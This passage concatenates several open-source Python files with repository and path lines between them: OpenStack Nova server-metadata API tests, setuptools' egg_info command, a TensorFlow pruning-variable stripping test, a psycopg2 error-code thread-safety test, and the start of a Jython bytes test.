req, self.uuid, "key1", body=body)
def test_update_item_too_many_keys(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = self._get_request('/key1')
req.method = 'PUT'
body = {"meta": {"key1": "value1", "key2": "value2"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(self.validation_ex,
self.controller.update, req, self.uuid, 'key1',
body=body)
def test_update_item_body_uri_mismatch(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = self._get_request('/bad')
req.method = 'PUT'
body = {"meta": {"key1": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update, req, self.uuid, 'bad',
body=body)
def test_update_item_non_dict(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = self._get_request('/bad')
req.method = 'PUT'
body = {"meta": None}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(self.validation_ex,
self.controller.update, req, self.uuid, 'bad',
body=body)
def test_update_empty_container(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'PUT'
expected = {'metadata': {}}
req.body = jsonutils.dumps(expected)
req.headers["content-type"] = "application/json"
self.assertRaises(self.validation_ex,
self.controller.update, req, self.uuid, 'bad',
body=expected)
def test_too_many_metadata_items_on_create(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
data = {"metadata": {}}
for num in range(CONF.quota_metadata_items + 1):
data['metadata']['key%i' % num] = "blah"
req = self._get_request()
req.method = 'POST'
req.body = jsonutils.dumps(data)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPForbidden,
self.controller.create, req, self.uuid, body=data)
def test_invalid_metadata_items_on_create(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = self._get_request()
req.method = 'POST'
req.headers["content-type"] = "application/json"
# test for long key
data = {"metadata": {"a" * 260: "value1"}}
req.body = jsonutils.dumps(data)
self.assertRaises(self.validation_ex_large,
self.controller.create, req, self.uuid, body=data)
# test for long value
data = {"metadata": {"key": "v" * 260}}
req.body = jsonutils.dumps(data)
self.assertRaises(self.validation_ex_large,
self.controller.create, req, self.uuid, body=data)
# test for empty key.
data = {"metadata": {"": "value1"}}
req.body = jsonutils.dumps(data)
self.assertRaises(self.validation_ex,
self.controller.create, req, self.uuid, body=data)
def test_too_many_metadata_items_on_update_item(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
data = {"metadata": {}}
for num in range(CONF.quota_metadata_items + 1):
data['metadata']['key%i' % num] = "blah"
req = self._get_request()
req.method = 'PUT'
req.body = jsonutils.dumps(data)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPForbidden, self.controller.update_all,
req, self.uuid, body=data)
def test_invalid_metadata_items_on_update_item(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
data = {"metadata": {}}
for num in range(CONF.quota_metadata_items + 1):
data['metadata']['key%i' % num] = "blah"
req = self._get_request()
req.method = 'PUT'
req.body = jsonutils.dumps(data)
req.headers["content-type"] = "application/json"
# test for long key
data = {"metadata": {"a" * 260: "value1"}}
req.body = jsonutils.dumps(data)
self.assertRaises(self.validation_ex_large,
self.controller.update_all, req, self.uuid,
body=data)
# test for long value
data = {"metadata": {"key": "v" * 260}}
req.body = jsonutils.dumps(data)
self.assertRaises(self.validation_ex_large,
self.controller.update_all, req, self.uuid,
body=data)
# test for empty key.
data = {"metadata": {"": "value1"}}
req.body = jsonutils.dumps(data)
self.assertRaises(self.validation_ex,
self.controller.update_all, req, self.uuid,
body=data)
class ServerMetaDataTestV2(ServerMetaDataTestV21):
validation_ex = webob.exc.HTTPBadRequest
validation_ex_large = webob.exc.HTTPRequestEntityTooLarge
def _set_up_resources(self):
self.controller = server_metadata_v2.Controller()
self.uuid = str(uuid.uuid4())
self.url = '/v1.1/fake/servers/%s/metadata' % self.uuid
def _get_request(self, param_url=''):
return fakes.HTTPRequest.blank(self.url + param_url)
class BadStateServerMetaDataTestV21(test.TestCase):
def setUp(self):
super(BadStateServerMetaDataTestV21, self).setUp()
fakes.stub_out_key_pair_funcs(self.stubs)
self.stubs.Set(nova.db, 'instance_metadata_get',
return_server_metadata)
self.stubs.Set(compute_rpcapi.ComputeAPI, 'change_instance_metadata',
fake_change_instance_metadata)
self.stubs.Set(nova.db, 'instance_get', self._return_server_in_build)
self.stubs.Set(nova.db, 'instance_get_by_uuid',
self._return_server_in_build_by_uuid)
self.stubs.Set(nova.db, 'instance_metadata_delete',
delete_server_metadata)
self._set_up_resources()
def _set_up_resources(self):
self.controller = server_metadata_v21.ServerMetadataController()
self.uuid = str(uuid.uuid4())
self.url = '/fake/servers/%s/metadata' % self.uuid
def _get_request(self, param_url=''):
return fakes.HTTPRequestV3.blank(self.url + param_url)
def test_invalid_state_on_delete(self):
req = self._get_request('/key2')
req.method = 'DELETE'
self.assertRaises(webob.exc.HTTPConflict, self.controller.delete,
req, self.uuid, 'key2')
def test_invalid_state_on_update_metadata(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = self._get_request()
req.method = 'POST'
req.content_type = 'application/json'
expected = {
'metadata': {
'key1': 'updatedvalue',
'key29': 'newkey',
}
}
req.body = jsonutils.dumps(expected)
self.assertRaises(webob.exc.HTTPConflict, self.controller.update_all,
req, self.uuid, body=expected)
def _return_server_in_build(self, context, server_id,
columns_to_join=None):
return fake_instance.fake_db_instance(
**{'id': server_id,
'uuid': '0cc3346e-9fef-4445-abe6-5d2b2690ec64',
'name': 'fake',
'locked': False,
'vm_state': vm_states.BUILDING})
def _return_server_in_build_by_uuid(self, context, server_uuid,
columns_to_join=None, use_slave=False):
return fake_instance.fake_db_instance(
**{'id': 1,
'uuid': '0cc3346e-9fef-4445-abe6-5d2b2690ec64',
'name': 'fake',
'locked': False,
'vm_state': vm_states.BUILDING})
@mock.patch.object(nova.compute.api.API, 'update_instance_metadata',
side_effect=exception.InstanceIsLocked(instance_uuid=0))
def test_instance_lock_update_metadata(self, mock_update):
req = self._get_request()
req.method = 'POST'
req.content_type = 'application/json'
expected = {
'metadata': {
'keydummy': 'newkey',
}
}
req.body = jsonutils.dumps(expected)
self.assertRaises(webob.exc.HTTPConflict, self.controller.update_all,
req, self.uuid, body=expected)
class BadStateServerMetaDataTestV2(BadStateServerMetaDataTestV21):
def _set_up_resources(self):
self.controller = server_metadata_v2.Controller()
self.uuid = str(uuid.uuid4())
self.url = '/v1.1/fake/servers/%s/metadata' % self.uuid
def _get_request(self, param_url=''):
return fakes.HTTPRequest.blank(self.url + param_url)
class ServerMetaPolicyEnforcementV21(test.NoDBTestCase):
def setUp(self):
super(ServerMetaPolicyEnforcementV21, self).setUp()
self.controller = server_metadata_v21.ServerMetadataController()
self.req = fakes.HTTPRequest.blank('')
def test_create_policy_failed(self):
rule_name = "os_compute_api:server-metadata:create"
self.policy.set_rules({rule_name: "project:non_fake"})
exc = self.assertRaises(
exception.PolicyNotAuthorized,
self.controller.create, self.req, fakes.FAKE_UUID,
body={'metadata': {}})
self.assertEqual(
"Policy doesn't allow %s to be performed." % rule_name,
exc.format_message())
def test_index_policy_failed(self):
rule_name = "os_compute_api:server-metadata:index"
self.policy.set_rules({rule_name: "project:non_fake"})
exc = self.assertRaises(
exception.PolicyNotAuthorized,
self.controller.index, self.req, fakes.FAKE_UUID)
self.assertEqual(
"Policy doesn't allow %s to be performed." % rule_name,
exc.format_message())
def test_update_policy_failed(self):
rule_name = "os_compute_api:server-metadata:update"
self.policy.set_rules({rule_name: "project:non_fake"})
exc = self.assertRaises(
exception.PolicyNotAuthorized,
self.controller.update, self.req, fakes.FAKE_UUID, fakes.FAKE_UUID,
body={'meta': {'fake_meta': 'fake_meta'}})
self.assertEqual(
"Policy doesn't allow %s to be performed." % rule_name,
exc.format_message())
def test_update_all_policy_failed(self):
rule_name = "os_compute_api:server-metadata:update_all"
self.policy.set_rules({rule_name: "project:non_fake"})
exc = self.assertRaises(
exception.PolicyNotAuthorized,
self.controller.update_all, self.req, fakes.FAKE_UUID,
body={'metadata': {}})
self.assertEqual(
"Policy doesn't allow %s to be performed." % rule_name,
exc.format_message())
def test_delete_policy_failed(self):
rule_name = "os_compute_api:server-metadata:delete"
self.policy.set_rules({rule_name: "project:non_fake"})
exc = self.assertRaises(
exception.PolicyNotAuthorized,
self.controller.delete, self.req, fakes.FAKE_UUID, fakes.FAKE_UUID)
self.assertEqual(
"Policy doesn't allow %s to be performed." % rule_name,
exc.format_message())
def test_show_policy_failed(self):
rule_name = "os_compute_api:server-metadata:show"
self.policy.set_rules({rule_name: "project:non_fake"})
exc = self.assertRaises(
exception.PolicyNotAuthorized,
self.controller.show, self.req, fakes.FAKE_UUID, fakes.FAKE_UUID)
self.assertEqual(
"Policy doesn't allow %s to be performed." % rule_name,
exc.format_message())
|
ForgottenKahz/CloudOPC
|
refs/heads/master
|
venv/Lib/site-packages/setuptools/command/egg_info.py
|
100
|
"""setuptools.command.egg_info
Create a distribution's .egg-info directory and contents"""
from distutils.filelist import FileList as _FileList
from distutils.util import convert_path
from distutils import log
import distutils.errors
import distutils.filelist
import os
import re
import sys
try:
from setuptools_svn import svn_utils
except ImportError:
pass
from setuptools import Command
from setuptools.command.sdist import sdist
from setuptools.compat import basestring, PY3, StringIO
from setuptools.command.sdist import walk_revctrl
from pkg_resources import (
parse_requirements, safe_name, parse_version,
safe_version, yield_lines, EntryPoint, iter_entry_points, to_filename)
import setuptools.unicode_utils as unicode_utils
from pkg_resources import packaging
class egg_info(Command):
description = "create a distribution's .egg-info directory"
user_options = [
('egg-base=', 'e', "directory containing .egg-info directories"
" (default: top of the source tree)"),
('tag-svn-revision', 'r',
"Add subversion revision ID to version number"),
('tag-date', 'd', "Add date stamp (e.g. 20050528) to version number"),
('tag-build=', 'b', "Specify explicit tag to add to version number"),
('no-svn-revision', 'R',
"Don't add subversion revision ID [default]"),
('no-date', 'D', "Don't include date stamp [default]"),
]
boolean_options = ['tag-date', 'tag-svn-revision']
negative_opt = {'no-svn-revision': 'tag-svn-revision',
'no-date': 'tag-date'}
def initialize_options(self):
self.egg_name = None
self.egg_version = None
self.egg_base = None
self.egg_info = None
self.tag_build = None
self.tag_svn_revision = 0
self.tag_date = 0
self.broken_egg_info = False
self.vtags = None
def save_version_info(self, filename):
from setuptools.command.setopt import edit_config
values = dict(
egg_info=dict(
tag_svn_revision=0,
tag_date=0,
tag_build=self.tags(),
)
)
edit_config(filename, values)
def finalize_options(self):
self.egg_name = safe_name(self.distribution.get_name())
self.vtags = self.tags()
self.egg_version = self.tagged_version()
parsed_version = parse_version(self.egg_version)
try:
is_version = isinstance(parsed_version, packaging.version.Version)
spec = (
"%s==%s" if is_version else "%s===%s"
)
list(
parse_requirements(spec % (self.egg_name, self.egg_version))
)
except ValueError:
raise distutils.errors.DistutilsOptionError(
"Invalid distribution name or version syntax: %s-%s" %
(self.egg_name, self.egg_version)
)
if self.egg_base is None:
dirs = self.distribution.package_dir
self.egg_base = (dirs or {}).get('', os.curdir)
self.ensure_dirname('egg_base')
self.egg_info = to_filename(self.egg_name) + '.egg-info'
if self.egg_base != os.curdir:
self.egg_info = os.path.join(self.egg_base, self.egg_info)
if '-' in self.egg_name:
self.check_broken_egg_info()
# Set package version for the benefit of dumber commands
# (e.g. sdist, bdist_wininst, etc.)
#
self.distribution.metadata.version = self.egg_version
# If we bootstrapped around the lack of a PKG-INFO, as might be the
# case in a fresh checkout, make sure that any special tags get added
# to the version info
#
pd = self.distribution._patched_dist
if pd is not None and pd.key == self.egg_name.lower():
pd._version = self.egg_version
pd._parsed_version = parse_version(self.egg_version)
self.distribution._patched_dist = None
def write_or_delete_file(self, what, filename, data, force=False):
"""Write `data` to `filename` or delete if empty
If `data` is non-empty, this routine is the same as ``write_file()``.
If `data` is empty but not ``None``, this is the same as calling
``delete_file(filename)`. If `data` is ``None``, then this is a no-op
unless `filename` exists, in which case a warning is issued about the
orphaned file (if `force` is false), or deleted (if `force` is true).
"""
if data:
self.write_file(what, filename, data)
elif os.path.exists(filename):
if data is None and not force:
log.warn(
"%s not set in setup(), but %s exists", what, filename
)
return
else:
self.delete_file(filename)
def write_file(self, what, filename, data):
"""Write `data` to `filename` (if not a dry run) after announcing it
`what` is used in a log message to identify what is being written
to the file.
"""
log.info("writing %s to %s", what, filename)
if PY3:
data = data.encode("utf-8")
if not self.dry_run:
f = open(filename, 'wb')
f.write(data)
f.close()
def delete_file(self, filename):
"""Delete `filename` (if not a dry run) after announcing it"""
log.info("deleting %s", filename)
if not self.dry_run:
os.unlink(filename)
def tagged_version(self):
version = self.distribution.get_version()
# egg_info may be called more than once for a distribution,
# in which case the version string already contains all tags.
if self.vtags and version.endswith(self.vtags):
return safe_version(version)
return safe_version(version + self.vtags)
def run(self):
self.mkpath(self.egg_info)
installer = self.distribution.fetch_build_egg
for ep in iter_entry_points('egg_info.writers'):
writer = ep.load(installer=installer)
writer(self, ep.name, os.path.join(self.egg_info, ep.name))
# Get rid of native_libs.txt if it was put there by older bdist_egg
nl = os.path.join(self.egg_info, "native_libs.txt")
if os.path.exists(nl):
self.delete_file(nl)
self.find_sources()
def tags(self):
version = ''
if self.tag_build:
version += self.tag_build
if self.tag_svn_revision:
rev = self.get_svn_revision()
if rev: # is 0 if it's not an svn working copy
version += '-r%s' % rev
if self.tag_date:
import time
version += time.strftime("-%Y%m%d")
return version
@staticmethod
def get_svn_revision():
if 'svn_utils' not in globals():
return "0"
return str(svn_utils.SvnInfo.load(os.curdir).get_revision())
def find_sources(self):
"""Generate SOURCES.txt manifest file"""
manifest_filename = os.path.join(self.egg_info, "SOURCES.txt")
mm = manifest_maker(self.distribution)
mm.manifest = manifest_filename
mm.run()
self.filelist = mm.filelist
def check_broken_egg_info(self):
bei = self.egg_name + '.egg-info'
if self.egg_base != os.curdir:
bei = os.path.join(self.egg_base, bei)
if os.path.exists(bei):
log.warn(
"-" * 78 + '\n'
"Note: Your current .egg-info directory has a '-' in its name;"
'\nthis will not work correctly with "setup.py develop".\n\n'
'Please rename %s to %s to correct this problem.\n' + '-' * 78,
bei, self.egg_info
)
self.broken_egg_info = self.egg_info
self.egg_info = bei # make it work for now
class FileList(_FileList):
"""File list that accepts only existing, platform-independent paths"""
def append(self, item):
if item.endswith('\r'): # Fix older sdists built on Windows
item = item[:-1]
path = convert_path(item)
if self._safe_path(path):
self.files.append(path)
def extend(self, paths):
self.files.extend(filter(self._safe_path, paths))
def _repair(self):
"""
Replace self.files with only safe paths
Because some owners of FileList manipulate the underlying
``files`` attribute directly, this method must be called to
repair those paths.
"""
self.files = list(filter(self._safe_path, self.files))
def _safe_path(self, path):
enc_warn = "'%s' not %s encodable -- skipping"
# To avoid accidental trans-codings errors, first to unicode
u_path = unicode_utils.filesys_decode(path)
if u_path is None:
log.warn("'%s' in unexpected encoding -- skipping" % path)
return False
# Must ensure utf-8 encodability
utf8_path = unicode_utils.try_encode(u_path, "utf-8")
if utf8_path is None:
log.warn(enc_warn, path, 'utf-8')
return False
try:
# accept is either way checks out
if os.path.exists(u_path) or os.path.exists(utf8_path):
return True
# this will catch any encode errors decoding u_path
except UnicodeEncodeError:
log.warn(enc_warn, path, sys.getfilesystemencoding())
class manifest_maker(sdist):
template = "MANIFEST.in"
def initialize_options(self):
self.use_defaults = 1
self.prune = 1
self.manifest_only = 1
self.force_manifest = 1
def finalize_options(self):
pass
def run(self):
self.filelist = FileList()
if not os.path.exists(self.manifest):
self.write_manifest() # it must exist so it'll get in the list
self.filelist.findall()
self.add_defaults()
if os.path.exists(self.template):
self.read_template()
self.prune_file_list()
self.filelist.sort()
self.filelist.remove_duplicates()
self.write_manifest()
def _manifest_normalize(self, path):
path = unicode_utils.filesys_decode(path)
return path.replace(os.sep, '/')
def write_manifest(self):
"""
Write the file list in 'self.filelist' to the manifest file
named by 'self.manifest'.
"""
self.filelist._repair()
# Now _repairs should encodability, but not unicode
files = [self._manifest_normalize(f) for f in self.filelist.files]
msg = "writing manifest file '%s'" % self.manifest
self.execute(write_file, (self.manifest, files), msg)
def warn(self, msg): # suppress missing-file warnings from sdist
if not msg.startswith("standard file not found:"):
sdist.warn(self, msg)
def add_defaults(self):
sdist.add_defaults(self)
self.filelist.append(self.template)
self.filelist.append(self.manifest)
rcfiles = list(walk_revctrl())
if rcfiles:
self.filelist.extend(rcfiles)
elif os.path.exists(self.manifest):
self.read_manifest()
ei_cmd = self.get_finalized_command('egg_info')
self._add_egg_info(cmd=ei_cmd)
self.filelist.include_pattern("*", prefix=ei_cmd.egg_info)
def _add_egg_info(self, cmd):
"""
Add paths for egg-info files for an external egg-base.
The egg-info files are written to egg-base. If egg-base is
outside the current working directory, this method
searchs the egg-base directory for files to include
in the manifest. Uses distutils.filelist.findall (which is
really the version monkeypatched in by setuptools/__init__.py)
to perform the search.
Since findall records relative paths, prefix the returned
paths with cmd.egg_base, so add_default's include_pattern call
(which is looking for the absolute cmd.egg_info) will match
them.
"""
if cmd.egg_base == os.curdir:
# egg-info files were already added by something else
return
discovered = distutils.filelist.findall(cmd.egg_base)
resolved = (os.path.join(cmd.egg_base, path) for path in discovered)
self.filelist.allfiles.extend(resolved)
def prune_file_list(self):
build = self.get_finalized_command('build')
base_dir = self.distribution.get_fullname()
self.filelist.exclude_pattern(None, prefix=build.build_base)
self.filelist.exclude_pattern(None, prefix=base_dir)
sep = re.escape(os.sep)
self.filelist.exclude_pattern(r'(^|' + sep + r')(RCS|CVS|\.svn)' + sep,
is_regex=1)
def write_file(filename, contents):
"""Create a file with the specified name and write 'contents' (a
sequence of strings without line terminators) to it.
"""
contents = "\n".join(contents)
# assuming the contents has been vetted for utf-8 encoding
contents = contents.encode("utf-8")
with open(filename, "wb") as f: # always write POSIX-style manifest
f.write(contents)
def write_pkg_info(cmd, basename, filename):
log.info("writing %s", filename)
if not cmd.dry_run:
metadata = cmd.distribution.metadata
metadata.version, oldver = cmd.egg_version, metadata.version
metadata.name, oldname = cmd.egg_name, metadata.name
try:
# write unescaped data to PKG-INFO, so older pkg_resources
# can still parse it
metadata.write_pkg_info(cmd.egg_info)
finally:
metadata.name, metadata.version = oldname, oldver
safe = getattr(cmd.distribution, 'zip_safe', None)
from setuptools.command import bdist_egg
bdist_egg.write_safety_flag(cmd.egg_info, safe)
def warn_depends_obsolete(cmd, basename, filename):
if os.path.exists(filename):
log.warn(
"WARNING: 'depends.txt' is not used by setuptools 0.6!\n"
"Use the install_requires/extras_require setup() args instead."
)
def _write_requirements(stream, reqs):
lines = yield_lines(reqs or ())
append_cr = lambda line: line + '\n'
lines = map(append_cr, lines)
stream.writelines(lines)
def write_requirements(cmd, basename, filename):
dist = cmd.distribution
data = StringIO()
_write_requirements(data, dist.install_requires)
extras_require = dist.extras_require or {}
for extra in sorted(extras_require):
data.write('\n[{extra}]\n'.format(**vars()))
_write_requirements(data, extras_require[extra])
cmd.write_or_delete_file("requirements", filename, data.getvalue())
def write_setup_requirements(cmd, basename, filename):
data = StringIO()
_write_requirements(data, cmd.distribution.setup_requires)
cmd.write_or_delete_file("setup-requirements", filename, data.getvalue())
def write_toplevel_names(cmd, basename, filename):
pkgs = dict.fromkeys(
[
k.split('.', 1)[0]
for k in cmd.distribution.iter_distribution_names()
]
)
cmd.write_file("top-level names", filename, '\n'.join(sorted(pkgs)) + '\n')
def overwrite_arg(cmd, basename, filename):
write_arg(cmd, basename, filename, True)
def write_arg(cmd, basename, filename, force=False):
argname = os.path.splitext(basename)[0]
value = getattr(cmd.distribution, argname, None)
if value is not None:
value = '\n'.join(value) + '\n'
cmd.write_or_delete_file(argname, filename, value, force)
def write_entries(cmd, basename, filename):
ep = cmd.distribution.entry_points
if isinstance(ep, basestring) or ep is None:
data = ep
elif ep is not None:
data = []
for section, contents in sorted(ep.items()):
if not isinstance(contents, basestring):
contents = EntryPoint.parse_group(section, contents)
contents = '\n'.join(sorted(map(str, contents.values())))
data.append('[%s]\n%s\n\n' % (section, contents))
data = ''.join(data)
cmd.write_or_delete_file('entry points', filename, data, True)
def get_pkg_info_revision():
# See if we can get a -r### off of PKG-INFO, in case this is an sdist of
# a subversion revision
#
if os.path.exists('PKG-INFO'):
f = open('PKG-INFO', 'rU')
for line in f:
match = re.match(r"Version:.*-r(\d+)\s*$", line)
if match:
return int(match.group(1))
f.close()
return 0
|
jbedorf/tensorflow
|
refs/heads/master
|
tensorflow/contrib/model_pruning/python/strip_pruning_vars_test.py
|
25
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for strip_pruning_vars."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import re
from tensorflow.contrib.model_pruning.python import pruning
from tensorflow.contrib.model_pruning.python import strip_pruning_vars_lib
from tensorflow.contrib.model_pruning.python.layers import layers
from tensorflow.contrib.model_pruning.python.layers import rnn_cells
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import graph_util
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import rnn
from tensorflow.python.ops import rnn_cell as tf_rnn_cells
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import training_util
def _get_number_pruning_vars(graph_def):
number_vars = 0
for node in graph_def.node:
if re.match(r"^.*(mask$)|(threshold$)", node.name):
number_vars += 1
return number_vars
def _get_node_names(tensor_names):
return [
strip_pruning_vars_lib._node_name(tensor_name)
for tensor_name in tensor_names
]
class StripPruningVarsTest(test.TestCase):
def setUp(self):
param_list = [
"pruning_frequency=1", "begin_pruning_step=1", "end_pruning_step=10",
"nbins=2048", "threshold_decay=0.0"
]
self.initial_graph = ops.Graph()
self.initial_graph_def = None
self.final_graph = ops.Graph()
self.final_graph_def = None
self.pruning_spec = ",".join(param_list)
with self.initial_graph.as_default():
self.sparsity = variables.Variable(0.5, name="sparsity")
self.global_step = training_util.get_or_create_global_step()
self.increment_global_step = state_ops.assign_add(self.global_step, 1)
self.mask_update_op = None
def _build_convolutional_model(self, number_of_layers):
# Create a graph with several conv2d layers
kernel_size = 3
base_depth = 4
depth_step = 7
height, width = 7, 9
with variable_scope.variable_scope("conv_model"):
input_tensor = array_ops.ones((8, height, width, base_depth))
top_layer = input_tensor
for ix in range(number_of_layers):
top_layer = layers.masked_conv2d(
top_layer,
base_depth + (ix + 1) * depth_step,
kernel_size,
scope="Conv_" + str(ix))
return top_layer
def _build_fully_connected_model(self, number_of_layers):
base_depth = 4
depth_step = 7
input_tensor = array_ops.ones((8, base_depth))
top_layer = input_tensor
with variable_scope.variable_scope("fc_model"):
for ix in range(number_of_layers):
top_layer = layers.masked_fully_connected(
top_layer, base_depth + (ix + 1) * depth_step)
return top_layer
def _build_lstm_model(self, number_of_layers):
batch_size = 8
dim = 10
inputs = variables.Variable(random_ops.random_normal([batch_size, dim]))
def lstm_cell():
return rnn_cells.MaskedBasicLSTMCell(
dim, forget_bias=0.0, state_is_tuple=True, reuse=False)
cell = tf_rnn_cells.MultiRNNCell(
[lstm_cell() for _ in range(number_of_layers)], state_is_tuple=True)
outputs = rnn.static_rnn(
cell, [inputs],
initial_state=cell.zero_state(batch_size, dtypes.float32))
return outputs
def _prune_model(self, session):
pruning_hparams = pruning.get_pruning_hparams().parse(self.pruning_spec)
p = pruning.Pruning(pruning_hparams, sparsity=self.sparsity)
self.mask_update_op = p.conditional_mask_update_op()
variables.global_variables_initializer().run()
for _ in range(20):
session.run(self.mask_update_op)
session.run(self.increment_global_step)
def _get_outputs(self, session, input_graph, tensors_list, graph_prefix=None):
outputs = []
for output_tensor in tensors_list:
if graph_prefix:
output_tensor = graph_prefix + "/" + output_tensor
outputs.append(
session.run(session.graph.get_tensor_by_name(output_tensor)))
return outputs
def _get_initial_outputs(self, output_tensor_names_list):
with self.session(graph=self.initial_graph) as sess1:
self._prune_model(sess1)
reference_outputs = self._get_outputs(sess1, self.initial_graph,
output_tensor_names_list)
self.initial_graph_def = graph_util.convert_variables_to_constants(
sess1, sess1.graph.as_graph_def(),
_get_node_names(output_tensor_names_list))
return reference_outputs
def _get_final_outputs(self, output_tensor_names_list):
self.final_graph_def = strip_pruning_vars_lib.strip_pruning_vars_fn(
self.initial_graph_def, _get_node_names(output_tensor_names_list))
_ = importer.import_graph_def(self.final_graph_def, name="final")
with self.test_session(self.final_graph) as sess2:
final_outputs = self._get_outputs(
sess2,
self.final_graph,
output_tensor_names_list,
graph_prefix="final")
return final_outputs
def _check_removal_of_pruning_vars(self, number_masked_layers):
self.assertEqual(
_get_number_pruning_vars(self.initial_graph_def), number_masked_layers)
self.assertEqual(_get_number_pruning_vars(self.final_graph_def), 0)
def _check_output_equivalence(self, initial_outputs, final_outputs):
for initial_output, final_output in zip(initial_outputs, final_outputs):
self.assertAllEqual(initial_output, final_output)
def testConvolutionalModel(self):
with self.initial_graph.as_default():
number_masked_conv_layers = 5
top_layer = self._build_convolutional_model(number_masked_conv_layers)
output_tensor_names = [top_layer.name]
initial_outputs = self._get_initial_outputs(output_tensor_names)
# Remove pruning-related nodes.
with self.final_graph.as_default():
final_outputs = self._get_final_outputs(output_tensor_names)
# Check that the final graph has no pruning-related vars
self._check_removal_of_pruning_vars(number_masked_conv_layers)
# Check that outputs remain the same after removal of pruning-related nodes
self._check_output_equivalence(initial_outputs, final_outputs)
def testFullyConnectedModel(self):
with self.initial_graph.as_default():
number_masked_fc_layers = 3
top_layer = self._build_fully_connected_model(number_masked_fc_layers)
output_tensor_names = [top_layer.name]
initial_outputs = self._get_initial_outputs(output_tensor_names)
# Remove pruning-related nodes.
with self.final_graph.as_default():
final_outputs = self._get_final_outputs(output_tensor_names)
# Check that the final graph has no pruning-related vars
self._check_removal_of_pruning_vars(number_masked_fc_layers)
# Check that outputs remain the same after removal of pruning-related nodes
self._check_output_equivalence(initial_outputs, final_outputs)
def testLSTMModel(self):
with self.initial_graph.as_default():
number_masked_lstm_layers = 2
outputs = self._build_lstm_model(number_masked_lstm_layers)
output_tensor_names = [outputs[0][0].name]
initial_outputs = self._get_initial_outputs(output_tensor_names)
# Remove pruning-related nodes.
with self.final_graph.as_default():
final_outputs = self._get_final_outputs(output_tensor_names)
# Check that the final graph has no pruning-related vars
self._check_removal_of_pruning_vars(number_masked_lstm_layers)
# Check that outputs remain the same after removal of pruning-related nodes
self._check_output_equivalence(initial_outputs, final_outputs)
if __name__ == "__main__":
test.main()
|
mcsosa121/cafa
|
refs/heads/master
|
cafaenv/lib/python2.7/site-packages/psycopg2/tests/test_errcodes.py
|
7
|
#!/usr/bin/env python
# test_errcodes.py - unit test for psycopg2.errcodes module
#
# Copyright (C) 2015 Daniele Varrazzo <daniele.varrazzo@gmail.com>
#
# psycopg2 is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# In addition, as a special exception, the copyright holders give
# permission to link this program with the OpenSSL library (or with
# modified versions of OpenSSL that use the same license as OpenSSL),
# and distribute linked combinations including the two.
#
# You must obey the GNU Lesser General Public License in all respects for
# all of the code used other than OpenSSL.
#
# psycopg2 is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public
# License for more details.
from testutils import unittest, ConnectingTestCase
try:
reload
except NameError:
from imp import reload
from threading import Thread
from psycopg2 import errorcodes
class ErrocodeTests(ConnectingTestCase):
def test_lookup_threadsafe(self):
# Increase if it does not fail with KeyError
MAX_CYCLES = 2000
errs = []
def f(pg_code='40001'):
try:
errorcodes.lookup(pg_code)
except Exception, e:
errs.append(e)
for __ in xrange(MAX_CYCLES):
reload(errorcodes)
(t1, t2) = (Thread(target=f), Thread(target=f))
(t1.start(), t2.start())
(t1.join(), t2.join())
if errs:
self.fail(
"raised %s errors in %s cycles (first is %s %s)" % (
len(errs), MAX_CYCLES,
errs[0].__class__.__name__, errs[0]))
def test_suite():
return unittest.TestLoader().loadTestsFromName(__name__)
if __name__ == "__main__":
unittest.main()
|
tunneln/CarnotKE
|
refs/heads/master
|
jyhton/Lib/test/test_bytes.py
|
9
|
"""Unit tests for the bytes and bytearray types.
XXX This is a mess. Common tests should be moved to buffer_tests.py,
which itself ought to be unified with string_tests.py (and the latter
should be modernized).
"""
import os
import re
import sys
import copy
import functools
import pickle
import tempfile
import unittest
import test.test_support
import test.string_tests
import test.buffer_tests
if sys.flags.bytes_warning:
def check_bytes_warnings(func):
@functools.wraps(func)
def wrapper(*args, **kw):
with test.test_support.check_warnings(('', BytesWarning)):
return func(*args, **kw)
return wrapper
else:
# no-op
def check_bytes_warnings(func):
return func
class Indexable:
def __init__(self, value=0):
self.value = value
def __index__(self):
return self.value
class BaseBytesTest(unittest.TestCase):
def test_basics(self):
b = self.type2test()
self.assertEqual(type(b), self.type2test)
self.assertEqual(b.__class__, self.type2test)
def test_empty_sequence(self):
